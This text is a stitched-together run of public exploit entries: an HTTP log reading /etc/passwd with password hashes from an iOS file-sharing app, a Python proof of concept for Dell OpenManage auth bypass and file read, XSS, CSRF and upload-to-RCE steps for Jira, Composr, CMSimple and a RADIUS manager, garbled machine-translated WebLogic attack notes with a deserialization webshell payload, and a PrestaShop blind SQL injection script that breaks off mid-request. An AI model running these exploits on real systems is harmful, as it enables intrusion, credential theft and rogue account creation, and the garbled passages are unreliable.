"dir_desktop": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Desktop", "sys_type": 3 } } ------------------------------------------------------------------------------------- POST /op=get_file_list HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 0 HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "//usr", "is_local": true, "is_hide": false, "is_floder": true, "name": "usr", "name_display": "usr", "file_size": 288, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//bin", "is_local": true, "is_hide": false, "is_floder": true, "name": "bin", "name_display": "bin", "file_size": 128, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//sbin", "is_local": true, "is_hide": false, "is_floder": true, "name": "sbin", "name_display": "sbin", "file_size": 544, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.file", "is_local": true, "is_hide": true, "is_floder": false, "name": ".file", "name_display": ".file", "file_size": 0, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//etc", "is_local": true, "is_hide": false, "is_floder": true, "name": "etc", "name_display": "etc", "file_size": 11, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//System", "is_local": true, "is_hide": false, "is_floder": true, "name": "System", "name_display": "System", "file_size": 128, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//var", "is_local": true, "is_hide": false, "is_floder": true, "name": "var", "name_display": "var", "file_size": 11, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//Library", "is_local": true, "is_hide": false, "is_floder": true, "name": "Library", "name_display": "Library", "file_size": 672, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//private", "is_local": true, "is_hide": false, "is_floder": true, "name": "private", "name_display": "private", "file_size": 224, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//dev", "is_local": true, "is_hide": false, "is_floder": true, "name": "dev", "name_display": "dev", "file_size": 1395, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.ba", "is_local": true, "is_hide": true, "is_floder": true, "name": ".ba", "name_display": ".ba", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//.mb", "is_local": true, "is_hide": true, "is_floder": true, "name": ".mb", "name_display": ".mb", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//tmp", "is_local": true, "is_hide": false, "is_floder": true, "name": "tmp", "name_display": "tmp", "file_size": 15, "create_time": 1577865.600000, "update_time": 1577865.600000, "sys_type": 3 }, { "path": "//Applications", "is_local": true, "is_hide": false, "is_floder": true, "name": "Applications", "name_display": "Applications", "file_size": 3296, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//Developer", "is_local": true, "is_hide": false, "is_floder": true, "name": "Developer", "name_display": "Developer", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }, { "path": "//cores", "is_local": true, "is_hide": false, "is_floder": true, "name": "cores", "name_display": "cores", "file_size": 64, "create_time": 0, "update_time": 0, "sys_type": 3 }] } } ------------------------- using the data found: /var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/Download POST /op=get_file_list HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 101 {"path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents/"} HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/json Content-Range: bytes 0-0/-1 { "ret_code": 1, "ret_msg": "success", "data": { "list": [{ "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//GDT", "is_local": true, "is_hide": false, "is_floder": true, "name": "GDT", "name_display": "GDT", "file_size": 96, "create_time": 1617228.400302, "update_time": 1617228.400302, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//input_photo.jpg", "is_local": true, "is_hide": false, "is_floder": false, "name": "input_photo.jpg", "name_display": "input_photo.jpg", "file_size": 6141491, "create_time": 1617583.738397, "update_time": 1617583.738402, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Ico", "is_local": true, "is_hide": false, "is_floder": true, "name": "Ico", "name_display": "Ico", "file_size": 64, "create_time": 1617583.334913, "update_time": 1617583.334913, "sys_type": 3 }, { "path": "/var/mobile/Containers/Data/Application/EAD2E9B4-BC2F-4FD8-9D0C-6145E7044618/Documents//Download", "is_local": true, "is_hide": false, "is_floder": true, "name": "Download", "name_display": "Download", "file_size": 64, "create_time": 1617228.371587, "update_time": 1617228.371587, "sys_type": 3 }] } } ---------------------------------------------------------------------- GET /file=/etc/passwd HTTP/1.1 Host: 192.168.1.104:8039 Accept: */* Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8 Connection: keep-alive Accept-Encoding: gzip, deflate User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00) Content-Length: 4 {} HTTP/1.1 200 OK Server: bruce_wy/1.0.0 Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS Access-Control-Allow-Headers: Content-Type,Origin,Accept Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true P3P: CP=CAO PSA OUR Content-Type: application/octet-stream Content-Range: bytes 0-0/2018 Content-Length : 2018 ## # User Database # # This file is the authoritative user database. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _ftp:*:98:-2:FTP Daemon:/var/empty:/usr/bin/false _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false _wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false _installd:*:33:33:Install Daemon:/var/installd:/usr/bin/false _neagent:*:34:34:NEAgent:/var/empty:/usr/bin/false _ifccd:*:35:35:ifccd:/var/empty:/usr/bin/false _securityd:*:64:64:securityd:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false _distnote:*:241:241:Distributed Notifications:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _gpsd:*:267:267:GPS Daemon:/var/db/gpsd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _iconservices:*:276:276:Icon services:/var/empty:/usr/bin/false _fud:*:278:278:Firmware Update Daemon:/var/db/fud:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/empty:/usr/bin/false

# Exploit Title: Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read # Date: 4/27/2020 # Exploit Author: Rhino Security Labs # Version: <= 9.4 # Description: Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station. # CVE: CVE-2020-5377 # This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator # Proof of concept written by: David Yesland @daveysec with Rhino Security Labs # More information can be found here: # A patch for this issue can be found here: # https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability from xml.sax.saxutils import escape import BaseHTTPServer import requests import thread import ssl import sys import re import os import urllib3 urllib3.disable_warnings() if len(sys.argv) < 3: print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>' exit() #This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909 #Also check out https://github.com/hantwister/FakeDellOM class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_POST(s): data = '' content_len = int(s.headers.getheader('content-length', 0)) post_body = s.rfile.read(content_len) s.send_response(200) s.send_header("Content-type", "application/soap+xml;charset=UTF-8") s.end_headers() if "__00omacmd=getuserrightsonly" in post_body: data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>") if "__00omacmd=getaboutinfo " in post_body: data = escape("<ProductVersion>6.0.3</ProductVersion>") if data: requid = re.findall('>uuid:(.*?)<',post_body)[0] s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?> <s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule"> <s:Header> <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To> <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo> <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID> </s:Header> <s:Body> <n1:SendCmd_OUTPUT> <n1:ResultCode>0</n1:ResultCode> <n1:ReturnValue>'''+data+'''</n1:ReturnValue> </n1:SendCmd_OUTPUT> </s:Body> </s:Envelope>''') else: s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''') def log_message(self, format, *args): return createdCert = False if not os.path.isfile('./server.pem'): print '[-] No server.pem certifcate file found. Generating one...' os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"') createdCert = True def startServer(): server_class = BaseHTTPServer.HTTPServer httpd = httpd = server_class(('0.0.0.0', 443), MyHandler) httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) httpd.serve_forever() thread.start_new_thread(startServer,()) myIP = sys.argv[1] target = sys.argv[2] def bypassAuth(): values = {} url = "https://{}/LoginServlet?flag=true&managedws=false".format(target) data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"} r = requests.post(url, data=data, verify=False, allow_redirects=False) cookieheader = r.headers['Set-Cookie'] sessionid = re.findall('JSESSIONID=(.*?);',cookieheader) pathid = re.findall('Path=/(.*?);',cookieheader) values['sessionid'] = sessionid[0] values['pathid'] = pathid[0] return values ids = bypassAuth() sessionid = ids['sessionid'] pathid = ids['pathid'] print "Session: "+sessionid print "VID: "+pathid def readFile(target,sessid,pathid): while True: file = raw_input('file > ') url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file) cookies = {"JSESSIONID": sessid} r = requests.get(url, cookies=cookies, verify=False) print 'Reading contents of {}:\n{}'.format(file,r.content) def getPath(path): if path.lower().startswith('c:\\'): path = path[2:] path = path.replace('\\','/') return path readFile(target,sessionid,pathid)

# Exploit Title: Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS # Date: 07 Mar 2020 # Exploit Author: Captain_hook # Vendor Homepage: https://www.atlassian.com/ # Version: < 4.10.0 # Tested on: All OS # CVE: CVE-2020-14166 Summary: The /servicedesk/customer/portals resource in Jira Service Desk Server and Data Center before version 4.10.0 allows remote attackers with project administrator privileges to inject arbitrary HTML or JavaScript names via an Cross Site Scripting (XSS) vulnerability by uploading a html file. Steps to reproduce: 1- reach to this directory http://localhost:port/servicedesk/customer/portals?customize=true 2- There's a place where the banner can be uploaded when upload wizard popup you can see that the banner image restricted to image format, you can change that type easily 3- then you can upload HTML and javascript files and hijacking cookies or XSRF tokens. Original report in bugcrowd: https://bugcrowd.com/disclosures/61a50171-aa55-4126-b9f4-4e82b4b8c301/unrestricted-file-upload-stored-xss-for-token-hijacking Original ticket in atlassian: https://jira.atlassian.com/browse/JSDSERVER-6895?error=login_required&error_description=Login+required&state=28f8e754-fb05-4f5e-adda-79e252fe2c30

# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting # Date: 04/06/2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.36 # Tested on: Windows/Linux # CVE : CVE-2021-30150 Vulnerable Endpoint: https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

1。管理者ログインページ弱いパスワード ウェブロジックのポートは一般に7001であり、弱いパスワードは一般的にweblogic/oracle@123orweblogicであるか、特定の状況、会社名、人名などに基づいて推測し、ブルートフォースの亀裂にバープセイトの侵入者を使用できます。成功したら、War Package GetShellをアップロードできます。 2。 WebLogic SSRF Oracle WebLogic Webサーバーには、外部ホストがアクセスでき、内部ホストへのアクセスも可能になります。このURLが存在する場合 http://192.168.8.128:7001/uddiexplorer/searchPublicRegistries.jspにはSSRFがあります。 192.168.1.59:139のポート139（オープン）とポート138（開いていない）の復帰とポートオープニングステータスを聞いてみましょう。 http://192.168.8.128:7001/uddiexplorer/searchpublicregistries.jsp？operator=3http://192.168.1.59:139rdosearch=nametxtsearchname=sself busing=seart business+ http://192.168.8.128:7001/uddiexplorer/searchpublicregistries.jsp？operator=3http://192.168.1.59:138rdosearch=nametxtsearchname=severbtseartfor 3。 weblogic deserialization Wenlogic Deserializationの脆弱性は長い間暴露されてきました。インターネット上でさまざまなツールを見つけることができるので、ここでは言及しません。 4。 weblogic_uac ステップ1：クロールhttp://x.x.x.x.x.x.x33607001/wls-wsat/coordinatorporttype postリクエストを開始する（URLペアがOKである限り、任意のパッケージは大丈夫です） ステップ2 Content-Type:Text/XMLの追加ステップ3ボディにペイロードを置く soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' soapenv3360header work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/' Javajavaバージョン='1.4.0' class='java.beans.xmldecoder' オブジェクトクラス='java.io.printwriter' Stringservers/adminserver/tmp/_wl_internal/bea_wls_internal/9j4dqk/a.jsp/stringvoid method='println' string！[cdata [`ここに馬を設定します（馬のコードが長すぎるので、ここにアップロードされたps:を表示しないでください。中国語を含めないでください。エラーを報告しない場合は、中国人を削除してアップロードできます。 ]]/string/voidvoid method='close'/ /物体 /java /java /work:workcontext /soapenv3360header soapenv:body/ /soapenv3360envelope 上記はデフォルトのパスです。デフォルトのパスではなく、Linuxシステムでもある場合、次のペイロード爆発パスを使用できます。 soapenv3360envelope xmlns:soapenv='http://schemas.xmlsoap.org/soap/envelope/' soapenv3360header work:workcontext xmlns:work='http://bea.com/2004/06/soap/workarea/' Javaバージョン='1.8.0_131' class='java.beans.xmldecoder' void class='java.lang.processbuilder' array class='java.lang.string' length='3' void index='0' 文字列/bin/bash/string /空所 void index='1' 文字列-C/文字列 /空所 void index='2' stringfind $ domain_home -type d -name bea_wls_internal |読み取りf; /空所 /配列 void method='start' //void /java /work:workcontext /soapenv3360header soapenv:body/ /soapenv3360envelope 5。 weblogic online and offline decryption ウェブシェルがある場合は、オンラインで復号化できます アクセスのために次のコードをサーバーに入れ、s=''のウェブロジック暗号化パスワードを入力すると、boot.propertiesファイルで見つけることができます。デフォルトのパスは./././server/security/boot.propertiesです ％@page pageencoding='utf-8'％ ％@ページインポート='weblogic.security.internal。*、weblogic.security.internal.encryption。*'％ ％ encryptionservice es=null; ClearorEcryptedService CES=null; 文字列s=null; s='{aes} wffnch6k+9nz22r1gcmnylgur9ho5kz8ndgib/tuozu='; es=serializedsystemini.getEncryptionservice（）; if（es==null）{ out.println（ '暗号化サービスを初期化できません'）; 戻る; } ces=new clearorEncryptedService（es）; if（s！=null）{ out.println（ '\ ndecryptedパスワードis:' + ces.decrypt（s））; } ％ オフラインの復号化には、2つのファイルSerializedsystemini.datとboot.propertiesが必要です 出典：https://xz.aliyun.com/t/2149

# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF) # Date: April 8, 2021 (04/08/2021) # Exploit Author: Issac Briones # Vendor Homepage: http://www.dmasoftlab.com/ # Software Download: https://sourceforge.net/projects/radiusmanager/ # Version: 4.4.0 # CVE: CVE-2021-30147 <html> <body> < ! -- Change IP addr to IP addr that RADIUS manager is located -- > <form action="http://192.168.1.2/admin.php?cont=store_user" method="POST"> <input type="hidden" name="username" value="csrf_usr" /> <input type="hidden" name="enableuser" value="1" /> <input type="hidden" name="acctype" value="0" /> <input type="hidden" name="password1" value="csrfusr" /> <input type="hidden" name="password2" value="csrfusr" /> <input type="hidden" name="maccm" value="" /> <input type="hidden" name="mac" value="" /> <input type="hidden" name="ipmodecpe" value="0" /> <input type="hidden" name="simuse" value="1" /> <input type="hidden" name="firstname" value="" /> <input type="hidden" name="lastname" value="" /> <input type="hidden" name="company" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="zip" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="taxid" value="" /> <input type="hidden" name="srvid" value="0" /> <input type="hidden" name="downlimit" value="0" /> <input type="hidden" name="uplimit" value="0" /> <input type="hidden" name="comblimit" value="0" /> <input type="hidden" name="expiration" value="2021-04-06" /> <input type="hidden" name="uptimelimit" value="00:00:00" /> <input type="hidden" name="credits" value="0.00" /> <input type="hidden" name="contractid" value="" /> <input type="hidden" name="contractvalid" value="" /> <input type="hidden" name="gpslat" value="" /> <input type="hidden" name="gpslong" value="" /> <input type="hidden" name="comment" value="" /> <input type="hidden" name="superuser" value="{SUPERUSER}" /> <input type="hidden" name="lang" value="English" /> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="custattr" value="" /> <input type="hidden" name="cnic" value="" /> <input type="hidden" name="cnicfile1" value="(binary)" /> <input type="hidden" name="cnicfile2" value="(binary)" /> <input type="hidden" name="adduser" value="Add user" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

# Exploit Title: Composr 10.0.36 - Remote Code Execution # Date: 04/06/2021 # Exploit Author: Orion Hridoy # Vendor Homepage: https://compo.sr/ # Software Link: https://compo.sr/download.htm # Version: 10.0.36 # Tested on: Windows/Linux # CVE : CVE-2021-30149 A RCE on Composr CMS has been discovered by BugsBD Private LTD. We have a galleries security issue which allows us to upload a PHP file. Whenever we upload an image from galleries, Composr allows us to upload only images. If we tried to upload a PHP file from galleries uploader it will say someone attempting hacking activities. But we have a security issue on the Upload In Bulk section. Whenever we check allowed extension in Upload in bulk function we can see PHP is completely prohibited. But whenever we tamper the request and change the extension we can see it will upload the PHP file without other or server side verification. This allows a user to upload malicious file even when they restricted it. Steps To Reproduce: 1. Go to upload galleries. 2. Upload a image and tamper the request and change the extension from .jpg to .php 3. It will say hacking attempts, check the allowed extension and you can see it's not accepting PHP extension. 4. Now go to upload in bulk option. 5. Upload a image with PHP codes and tamper the request. 6. Change extension from .jpg to .php 7. It will get uploaded with the blocked PHP extension.

# Exploit Title: CMSimple 5.2 - 'External' Stored XSS # Date: 2021/04/07 # Exploit Author: Quadron Research Lab # Version: CMSimple 5.2 # Tested on: Windows 10 x64 HUN/ENG Professional # Vendor: https://www.cmsimple.org/en/ [Description] The CMSimple 5.2 allow stored XSS via the Settings > CMS > Filebrowser > "External:" input field. [Attack Vectors] The CMSimple cms "Filebrowser" "External:" input field not filter special chars. It is possible to place JavaScript code. The JavaScript code placed here is executed by clicking on the Page or Files tab. [Proof of Concept] https://github.com/Quadron-Research-Lab/CVE/blob/main/CMSimple_5.2_XSS.pdf

# Exploit Title: PrestaShop 1.7.6.7 - 'location' Blind Sql Injection # Date: 2021-04-08 # Exploit Author: Vanshal Gaur # Vendor Homepage: https://www.prestashop.com/ # Version: 1.7.5.x < 1.7.6.8 # Tested on: Debian 10 (buster) # CVE : CVE-2020-15160 #!/usr/bin/python3 ''' Setup Vulnerable Docker on "localhost:8080": docker network create prestashop-net docker run -ti --name mysql_z --network prestashop-net -e MYSQL_ROOT_PASSWORD=admin -p 3307:3306 -d mysql:5.7 docker run -ti --name prestashop_z --network prestashop-net -e DB_SERVER=mysql_z -p 8080:80 -d prestashop/prestashop:1.7.6.7 ''' import requests import sys from lxml import html import re if len(sys.argv) != 7: print( ''' Exploit By: Vanshal Gaur Twitter Handle: @Vanshalg Exploit: CVE-2020-15160 PrestaShop blind Sql Injection 1.7.5.0 < 1.7.6.8 Before Running the script make sure to login and change "Combinations" to "Simple product" of the product and give that productid. Script will retrive the output of user() function, edit payload in script to retrive other data (Tested With Prestashop 1.7.6.7) Usage: python3 {} email password localhost 8080 productid /adminpath python3 exploit.py "test@gmail.com" "password" localhost 8080 11 /admin123 '''.format(sys.argv[0]) ) sys.exit(1) print("Exploiting...(Be Patient)\n") email = sys.argv[1] password = sys.argv[2] target_host = sys.argv[3] target_port = sys.argv[4] product_id = sys.argv[5] admin_path = sys.argv[6] target = "http://"+target_host+":"+target_port # proxies = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"} s = requests.Session() def login(s,target,password,email,admin_path): url = target+admin_path+"/index.php" data = {"ajax": "1", "token": '', "controller": "AdminLogin", "submitLogin": "1", "passwd": "TEMP", "email": "test@email.com"} data["passwd"] = password data["email"] = email r = s.post(url, data=data) login(s,target,password,email,admin_path) token_ext = s.get(target+admin_path+"/") token_junk = re.findall("sell/catalog/pro.*_token\=.*",token_ext.text) token_spit = re.split("\"",token_junk[0]) token_2 = re.split("\?",token_spit[0]) token = token_2[1] def productDetails_formtoken(s,target,product_id,admin_path): headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers) tree = html.fromstring(q.text) output = tree.xpath("//input[contains(@name,'form[_token]')]/@value") form_token = ''.join(output) return form_token form_token = productDetails_formtoken(s,target,product_id,admin_path) def productDetails_form_location(s,target,token,product_id,admin_path): headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers) tree = html.fromstring(q.text) output = tree.xpath("//input[contains(@name,'form[step3][location]')]/@value") form_location = ''.join(output) return form_location def sqli(s,token,form_token,payload,target,product_id,admin_path): for j in range(32, 126): sql_payload = payload.replace("[CHAR]", str(j)) url = target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} data = {"form[step1][name][1]": "Blind Sql Injection @Vanshalg", "form[step1][type_product]": "0", "form[step1][description_short][1]": "<p><span style=\"font-size:10pt;font-style:normal;\">Regular fit, round neckline, short sleeves. Made of extra long staple pima cotton. </span></p>\r\n<p></p>", "form[step1][description][1]": "<p><span style=\"font-size:10pt;font-style:normal;\"><span style=\"font-size:10pt;font-style:normal;\">Symbol of lightness and delicacy, the hummingbird evokes curiosity and joy.</span><span style=\"font-size:10pt;font-style:normal;\"> Studio Design' PolyFaune collection features classic products with colorful patterns, inspired by the traditional japanese origamis. To wear with a chino or jeans. The sublimation textile printing process provides an exceptional color rendering and a color, guaranteed overtime.</span></span></p>", "form[step1][features][0][feature]": "1", "form[step1][features][0][value]": "4", "form[step1][features][0][custom_value][1]": '', "form[step1][features][1][feature]": "2", "form[step1][features][1][value]": "8", "form[step1][features][1][custom_value][1]": '', "form[step1][id_manufacturer]": "1", "show_variations": "0", "form[step6][reference]": "demo_1", "form[step1][qty_0_shortcut]": "0", "form[step1][price_shortcut]": "23.900000", "form[step1][price_ttc_shortcut]": "23.9", "form[step2][id_tax_rules_group]": "1", "form[step1][id_category_default]": "4", "form[step1][categories][tree][]": "2", "form[step1][categories][tree][]": "3", "form[step1][categories][tree][]": "4", "ignore": "4", "form[step1][new_category][name]": '', "form[step1][new_category][id_parent]": "2", "form[step3][qty_0]": "0", "form[step3][minimal_quantity]": "1", "form[step3][location]": "TEST", "form[step3][low_stock_threshold]": '', "form[step3][virtual_product][is_virtual_file]": "0", "form[step3][virtual_product][name]": '', "form[step3][virtual_product][nb_downloadable]": '', "form[step3][virtual_product][expiration_date]": '', "form[step3][virtual_product][nb_days]": "0", "form[step3][pack_stock_type]": "3", "form[step3][attributes]": '', "product_combination_bulk[quantity]": '', "product_combination_bulk[cost_price]": '', "product_combination_bulk[impact_on_weight]": '', "product_combination_bulk[impact_on_price_te]": '', "product_combination_bulk[impact_on_price_ti]": '', "product_combination_bulk[date_availability]": '', "product_combination_bulk[reference]": '', "product_combination_bulk[minimal_quantity]": '', "product_combination_bulk[low_stock_threshold]": '', "product_combination_bulk[_token]": "0Dj8tJ3zd6YfSNgyxRFe6CfNbuMac6mn8rm_Gd52-to", "form[step3][out_of_stock]": "2", "form[step3][available_now][1]": '', "form[step3][available_later][1]": '', "form[step3][available_date]": '', "form[step4][width]": "0", "form[step4][height]": "0", "form[step4][depth]": "0", "form[step4][weight]": "0", "form[step4][additional_delivery_times]": "1", "form[step4][delivery_in_stock][1]": '', "form[step4][delivery_out_stock][1]": '', "form[step4][additional_shipping_cost]": "0.000000", "form[step2][price]": "23.900000", "form[step2][price_ttc]": "23.9", "form[step2][unit_price]": "0.000000", "form[step2][unity]": '', "form[step2][ecotax]": "0.000000", "form[step2][id_tax_rules_group]": "1", "form[step2][wholesale_price]": "0.000000", "form[step2][specific_price][sp_id_shop]": "1", "form[step2][specific_price][sp_id_currency]": '', "form[step2][specific_price][sp_id_country]": '', "form[step2][specific_price][sp_id_group]": '', "form[step2][specific_price][sp_id_product_attribute]": '', "form[step2][specific_price][sp_from]": '', "form[step2][specific_price][sp_to]": '', "form[step2][specific_price][sp_from_quantity]": "1", "form[step2][specific_price][leave_bprice]": "1", "form[step2][specific_price][sp_reduction]": "0.000000", "form[step2][specific_price][sp_reduction_type]": "amount", "form[step2][specific_price][sp_reduction_tax]": "1", "form[step2][specificPricePriority_0]": "id_shop", "form[step2][specificPricePriority_1]": "id_currency", "form[step2][specificPricePriority_2]": "id_country", "form[step2][specificPricePriority_3]": "id_group", "form[step5][meta_title][1]": '', "form[step5][meta_description][1]": '', "form[step5][link_rewrite][1]": "hummingbird-printed-t-shirt", "form[step5][redirect_type]": "301-category", "form[step6][visibility]": "both", "form[step6][display_options][available_for_order]": "1", "form[step6][display_options][show_price]": "1", "form[step6][tags][1]": '', "form[step6][condition]": "new", "form[step6][isbn]": '', "form[step6][ean13]": '', "form[step6][upc]": '', 